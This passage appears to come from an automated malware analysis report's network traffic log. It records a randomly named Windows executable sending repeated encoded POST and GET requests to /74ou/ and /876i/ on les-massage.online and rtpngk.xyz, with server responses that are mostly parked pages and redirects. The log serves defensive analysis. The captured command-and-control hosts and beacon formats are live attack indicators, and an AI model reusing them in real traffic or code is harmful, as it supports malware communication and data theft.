                                                                Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                                Sep 22, 2024 17:43:17.125221014 CEST | 1236 | IN | Data Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                                Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                                Sep 22, 2024 17:43:17.125252962 CEST | 1236 | IN | Data Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                                Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                                Sep 22, 2024 17:43:17.125288010 CEST | 1236 | IN | Data Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                                Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                                                Sep 22, 2024 17:43:17.125319958 CEST | 1236 | IN | Data Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                                                Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                                                                Sep 22, 2024 17:43:17.125359058 CEST | 1236 | IN | Data Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                                                Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                                                                Sep 22, 2024 17:43:17.125689030 CEST | 1236 | IN | Data Raw: 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72
                                                                Data Ascii: ("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Mat
                                                                Sep 22, 2024 17:43:17.125726938 CEST | 524 | IN | Data Raw: 77 5b 64 5d 3f 31 3a 30 29 29 29 2c 75 3d 6e 28 66 2c 69 2b 31 2c 69 3d 3d 63 29 2c 66 3d 30 2c 2b 2b 69 7d 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74
                                                                Data Ascii: w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                37 | 192.168.2.6 | 49761 | 194.58.112.174 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:43:22.618366957 CEST | 701 | OUT | POST /74ou/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.les-massage.online
                                                                Origin: http://www.les-massage.online
                                                                Referer: http://www.les-massage.online/74ou/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 36 6b 4f 73 6f 5a 42 31 59 78 41 76 69 35 43 59 42 47 6c 2b 76 46 50 42 4a 75 73 39 74 4e 43 76 53 4e 58 46 5a 43 63 45 44 52 67 61 54 52 76 52 66 58 6b 35 6e 59 6b 32 61 50 4a 41 52 62 4f 65 38 4e 44 35 74 37 36 4f 6a 70 61 33 4f 48 4e 5a 4d 53 45 2f 2b 67 39 61 48 71 6c 68 53 71 77 39 58 68 48 4d 48 2b 6f 47 2b 38 69 76 59 75 6a 6e 61 63 65 4f 43 66 6d 47 65 68 37 69 39 43 68 38 33 58 47 67 45 45 72 41 63 39 46 35 4f 79 64 68 57 43 6e 50 34 4b 4b 74 78 42 67 55 50 34 45 34 6e 65 48 70 79 72 2f 39 6d 49 59 75 2b 69 43 6f 66 38 57 4e 73 39 2f 6d 37 5a 6d 4c 4d 6b 4a 38 47 35 6e 6f 66 6e 43 41 55 6e 4d 79
                                                                Data Ascii: i4fTbV=6kOsoZB1YxAvi5CYBGl+vFPBJus9tNCvSNXFZCcEDRgaTRvRfXk5nYk2aPJARbOe8ND5t76Ojpa3OHNZMSE/+g9aHqlhSqw9XhHMH+oG+8ivYujnaceOCfmGeh7i9Ch83XGgEErAc9F5OydhWCnP4KKtxBgUP4E4neHpyr/9mIYu+iCof8WNs9/m7ZmLMkJ8G5nofnCAUnMy
                                                                Sep 22, 2024 17:43:23.348138094 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:43:23 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 68 0c 20 b4 ec 2a d3 f7 5c c7 53 75 4b d7 d6 f1 a5 2f 02 e5 36 4a 61 34 46 bb 9e 52 98 68 a0 3a 8e 6c 94 a4 eb 96 44 2f 50 1b b9 b8 2c 9e 21 47 91 6f da 61 88 49 26 fd 1d 2c 24 6b bd 21 21 99 ef 99 f8 b3 ba 5c 12 a4 41 28 6c 80 f9 ad 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe [TRUNCATED]
                                                                Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktUh *\SuK/6Ja4FRh:lD/P,!GoaI&,$k!!\A(l+7lC;pQ:V?~KYGoQ 7hgGUW]<ftt0y4JHPad%WAPvTv<6,#mSQd4b~gama+|\|j-"RAqnj4T=E}\DL$x7 ;TJ=mj3h,[J~xA!hv3y?YdnabJ}pAS[FlF#d0S6NmX`j(-dr>\4nz;h`d`=>\(|/4`+!3~b;+&j9Rs4CP-3="i?k;jo,u8X%9W+GohB(O?NN,OmYhI@~jAf4d_"NkPiao#gpPzsp;opt*P9*LEd>=TV'tUq{''b)eM+nw*RB [TRUNCATED]
                                                                Sep 22, 2024 17:43:23.348417997 CEST | 224 | IN | Data Raw: 1a 7d 4f db a7 b3 4e cc 5f a0 59 17 b9 55 d0 75 bc 96 ab 36 22 43 fb 37 26 8c 02 df eb 3e dd 28 e0 64 c0 dd a6 90 f6 2f a0 17 f1 0b ea 7d 1c df 03 ce 78 84 29 ae 9d 75 5f ad 9c 70 d4 d6 26 cf 25 69 fb 60 bd 01 22 a6 a7 30 ee 9f 11 07 ef 27 5f c2
                                                                Data Ascii: }ON_YUu6"C7&>(d/}x)u_p&%i`"0'_E'`&Iu$(Oud4N&Hz_2&Irk>P$G!+b8)o3BknQ.\#9Z/C
                                                                Sep 22, 2024 17:43:23.348432064 CEST | 1236 | IN | Data Raw: d0 ff 24 1f 62 45 3b f1 03 c8 b6 8b 85 60 11 c9 6d 41 69 4e 5a 80 c4 87 1d 33 ad a0 08 4a 0b de c1 ff 07 b4 c6 2c b4 42 03 c9 27 ac 05 f6 65 68 29 fe 0e 6a 41 db 1f 7e bd ff c6 dc 64 0d 06 e3 41 ab fd 53 f2 79 6a d6 7b 6c cd 74 99 4c 42 3b f1 23
                                                                Data Ascii: $bE;`mAiNZ3J,B'eh)jA~dASyj{ltLB;#dvxiXrA{oYyV.l+xv:0>K1R1,MtR709y\GFWmNN[0M#>%NwHiet @n*'RVK=}Jc`if*C
                                                                Sep 22, 2024 17:43:23.348671913 CEST | 1126 | IN | Data Raw: 3d 25 2e 28 70 a5 50 15 d3 8d a8 7d a0 70 2a e7 ad 4c 75 be 7e 64 ea eb 64 2c 5c 70 b4 9c ce dc 71 36 65 20 e8 4e 20 c4 95 2b ae be 47 03 5c 40 99 bf 1b a9 60 bc a6 5c 90 bf 1f 9c 73 dd 8a 28 cb b2 a8 4e cf 46 52 6c f8 01 e4 a5 31 1c f4 3f b1 82
                                                                Data Ascii: =%.(pP}p*Lu~dd,\pq6e N +G\@`\s(NFRl1?u=nC, OMx6j*t~fzCT/9u.9JkF2CNQ5>eRg)p^sRR7:HnM/xP)Sruz


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                38 | 192.168.2.6 | 49762 | 194.58.112.174 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:43:25.167112112 CEST | 725 | OUT | POST /74ou/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.les-massage.online
                                                                Origin: http://www.les-massage.online
                                                                Referer: http://www.les-massage.online/74ou/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 36 6b 4f 73 6f 5a 42 31 59 78 41 76 69 61 4b 59 4e 42 78 2b 74 6c 50 41 51 65 73 39 30 39 43 72 53 4e 4c 46 5a 41 77 71 44 44 45 61 53 30 4c 52 65 56 63 35 71 34 6b 32 4f 66 4a 46 65 37 4f 6a 38 4e 4f 4d 74 36 47 4f 6a 71 6d 33 4f 47 39 5a 4d 6c 6f 34 78 51 39 45 49 4b 6c 6a 4e 61 77 39 58 68 48 4d 48 2b 39 64 2b 38 71 76 59 65 54 6e 62 39 65 50 4b 2f 6d 46 5a 68 37 69 72 43 67 33 33 58 47 4f 45 46 6e 6d 63 37 4a 35 4f 7a 74 68 48 32 37 51 79 4b 4b 72 39 52 68 6a 66 36 74 52 71 73 4b 75 78 36 48 42 30 36 70 4f 2f 55 44 79 44 50 57 75 2b 74 66 6b 37 62 2b 35 4d 45 4a 57 45 35 66 6f 4e 77 4f 6e 62 54 70 52 43 6b 58 76 4f 56 56 30 69 54 35 53 64 38 71 6a 54 4f 78 6c 45 41 3d 3d
                                                                Data Ascii: i4fTbV=6kOsoZB1YxAviaKYNBx+tlPAQes909CrSNLFZAwqDDEaS0LReVc5q4k2OfJFe7Oj8NOMt6GOjqm3OG9ZMlo4xQ9EIKljNaw9XhHMH+9d+8qvYeTnb9ePK/mFZh7irCg33XGOEFnmc7J5OzthH27QyKKr9Rhjf6tRqsKux6HB06pO/UDyDPWu+tfk7b+5MEJWE5foNwOnbTpRCkXvOVV0iT5Sd8qjTOxlEA==
                                                                Sep 22, 2024 17:43:25.880189896 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:43:25 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 68 0c 20 b4 ec 2a d3 f7 5c c7 53 75 4b d7 d6 f1 a5 2f 02 e5 36 4a 61 34 46 bb 9e 52 98 68 a0 3a 8e 6c 94 a4 eb 96 44 2f 50 1b b9 b8 2c 9e 21 47 91 6f da 61 88 49 26 fd 1d 2c 24 6b bd 21 21 99 ef 99 f8 b3 ba 5c 12 a4 41 28 6c 80 f9 ad 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba 7e fe [TRUNCATED]
                                                                Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktUh *\SuK/6Ja4FRh:lD/P,!GoaI&,$k!!\A(l+7lC;pQ:V?~KYGoQ 7hgGUW]<ftt0y4JHPad%WAPvTv<6,#mSQd4b~gama+|\|j-"RAqnj4T=E}\DL$x7 ;TJ=mj3h,[J~xA!hv3y?YdnabJ}pAS[FlF#d0S6NmX`j(-dr>\4nz;h`d`=>\(|/4`+!3~b;+&j9Rs4CP-3="i?k;jo,u8X%9W+GohB(O?NN,OmYhI@~jAf4d_"NkPiao#gpPzsp;opt*P9*LEd>=TV'tUq{''b)eM+nw*RB [TRUNCATED]
                                                                Sep 22, 2024 17:43:25.880244017 CEST | 224 | IN | Data Raw: 1a 7d 4f db a7 b3 4e cc 5f a0 59 17 b9 55 d0 75 bc 96 ab 36 22 43 fb 37 26 8c 02 df eb 3e dd 28 e0 64 c0 dd a6 90 f6 2f a0 17 f1 0b ea 7d 1c df 03 ce 78 84 29 ae 9d 75 5f ad 9c 70 d4 d6 26 cf 25 69 fb 60 bd 01 22 a6 a7 30 ee 9f 11 07 ef 27 5f c2
                                                                Data Ascii: }ON_YUu6"C7&>(d/}x)u_p&%i`"0'_E'`&Iu$(Oud4N&Hz_2&Irk>P$G!+b8)o3BknQ.\#9Z/C
                                                                Sep 22, 2024 17:43:25.880319118 CEST | 1236 | IN | Data Raw: d0 ff 24 1f 62 45 3b f1 03 c8 b6 8b 85 60 11 c9 6d 41 69 4e 5a 80 c4 87 1d 33 ad a0 08 4a 0b de c1 ff 07 b4 c6 2c b4 42 03 c9 27 ac 05 f6 65 68 29 fe 0e 6a 41 db 1f 7e bd ff c6 dc 64 0d 06 e3 41 ab fd 53 f2 79 6a d6 7b 6c cd 74 99 4c 42 3b f1 23
                                                                Data Ascii: $bE;`mAiNZ3J,B'eh)jA~dASyj{ltLB;#dvxiXrA{oYyV.l+xv:0>K1R1,MtR709y\GFWmNN[0M#>%NwHiet @n*'RVK=}Jc`if*C
                                                                Sep 22, 2024 17:43:25.880354881 CEST | 1126 | IN | Data Raw: 3d 25 2e 28 70 a5 50 15 d3 8d a8 7d a0 70 2a e7 ad 4c 75 be 7e 64 ea eb 64 2c 5c 70 b4 9c ce dc 71 36 65 20 e8 4e 20 c4 95 2b ae be 47 03 5c 40 99 bf 1b a9 60 bc a6 5c 90 bf 1f 9c 73 dd 8a 28 cb b2 a8 4e cf 46 52 6c f8 01 e4 a5 31 1c f4 3f b1 82
                                                                Data Ascii: =%.(pP}p*Lu~dd,\pq6e N +G\@`\s(NFRl1?u=nC, OMx6j*t~fzCT/9u.9JkF2CNQ5>eRg)p^sRR7:HnM/xP)Sruz


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                39 | 192.168.2.6 | 49763 | 194.58.112.174 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:43:27.706856012 CEST | 1738 | OUT | POST /74ou/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.les-massage.online
                                                                Origin: http://www.les-massage.online
                                                                Referer: http://www.les-massage.online/74ou/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:43:28.381593943 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:43:28 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip
                                                                Data: (gzip-compressed body, raw bytes omitted)
                                                                Sep 22, 2024 17:43:28.381612062 CEST | 1236 | IN | (gzip-compressed body, raw bytes omitted)
                                                                Sep 22, 2024 17:43:28.381623983 CEST | 1236 | IN | (gzip-compressed body, raw bytes omitted)
                                                                Sep 22, 2024 17:43:28.382076979 CEST | 114 | IN | (gzip-compressed body, raw bytes omitted)


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                40 | 192.168.2.6 | 49764 | 194.58.112.174 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:43:30.252106905 CEST | 426 | OUT | GET /74ou/?i4fTbV=3mmMrs1mHi0xtqaDMxx5sGmAfYwz3fKeAP6hfCImDXgoS2DvTlMdmK0EBclDVq+276a7o9Kf0aGsTEl5XVQUxBF2OIg1GqwvGg+sN+gOtZPXTMPeHtLoUfm2FHWRrzdI/h6GADA=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.les-massage.online
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:43:30.957093000 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:43:30 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Data Ascii: 297f<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.les-massage.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://re [TRUNCATED]


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                41 | 192.168.2.6 | 49766 | 188.114.96.3 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:43:36.010691881 CEST | 677 | OUT | POST /876i/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.rtpngk.xyz
                                                                Origin: http://www.rtpngk.xyz
                                                                Referer: http://www.rtpngk.xyz/876i/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=HkaQ9ze9SIOfbMwYqOCJUNm5Drwucprs78NvxvAMmopxGAVfrY9pGtRLAWpptZb+7obzsU0s3f2qSTq1aq1Ecu04inwC5FyHaPGcnhQCPp6SVQrl59VxdCVE6XxWY8SoBvN4HHzNo5Mw+LMq/q2ZdNJ8Quuk5SR6YWw9Ih5u3Hw5x5s4aEvcO5wFFOyZWlPEH1oenkTuHaFO
                                                                Sep 22, 2024 17:43:36.596529007 CEST | 814 | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Sun, 22 Sep 2024 15:43:36 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 167
                                                                Connection: close
                                                                Cache-Control: max-age=3600
                                                                Expires: Sun, 22 Sep 2024 16:43:36 GMT
                                                                Location: https://www.rtpngk.xyz/876i/
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fy5uk%2BPp%2FTdRR2N1FcyiFmHw3%2BG91sQe7nkiOf2DUJieRASzY%2BBBJsVaGW6Y5XMsZWYBax7yCfjkFk8ALlEJj9cBA37cxiL1GFGkJ9X6BUyv6ShVuMCLMKKjZ0FUTYtgIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8c73695c9ec41a1f-EWR
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                Sep 22, 2024 17:43:37.631067038 CEST | 814 | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Sun, 22 Sep 2024 15:43:36 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 167
                                                                Connection: close
                                                                Cache-Control: max-age=3600
                                                                Expires: Sun, 22 Sep 2024 16:43:36 GMT
                                                                Location: https://www.rtpngk.xyz/876i/
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fy5uk%2BPp%2FTdRR2N1FcyiFmHw3%2BG91sQe7nkiOf2DUJieRASzY%2BBBJsVaGW6Y5XMsZWYBax7yCfjkFk8ALlEJj9cBA37cxiL1GFGkJ9X6BUyv6ShVuMCLMKKjZ0FUTYtgIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8c73695c9ec41a1f-EWR
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                Sep 22, 2024 17:43:37.631455898 CEST | 814 | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Sun, 22 Sep 2024 15:43:36 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 167
                                                                Connection: close
                                                                Cache-Control: max-age=3600
                                                                Expires: Sun, 22 Sep 2024 16:43:36 GMT
                                                                Location: https://www.rtpngk.xyz/876i/
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fy5uk%2BPp%2FTdRR2N1FcyiFmHw3%2BG91sQe7nkiOf2DUJieRASzY%2BBBJsVaGW6Y5XMsZWYBax7yCfjkFk8ALlEJj9cBA37cxiL1GFGkJ9X6BUyv6ShVuMCLMKKjZ0FUTYtgIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8c73695c9ec41a1f-EWR
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                42 | 192.168.2.6 | 49767 | 188.114.96.3 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:43:38.552741051 CEST | 701 | OUT | POST /876i/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.rtpngk.xyz
                                                                Origin: http://www.rtpngk.xyz
                                                                Referer: http://www.rtpngk.xyz/876i/
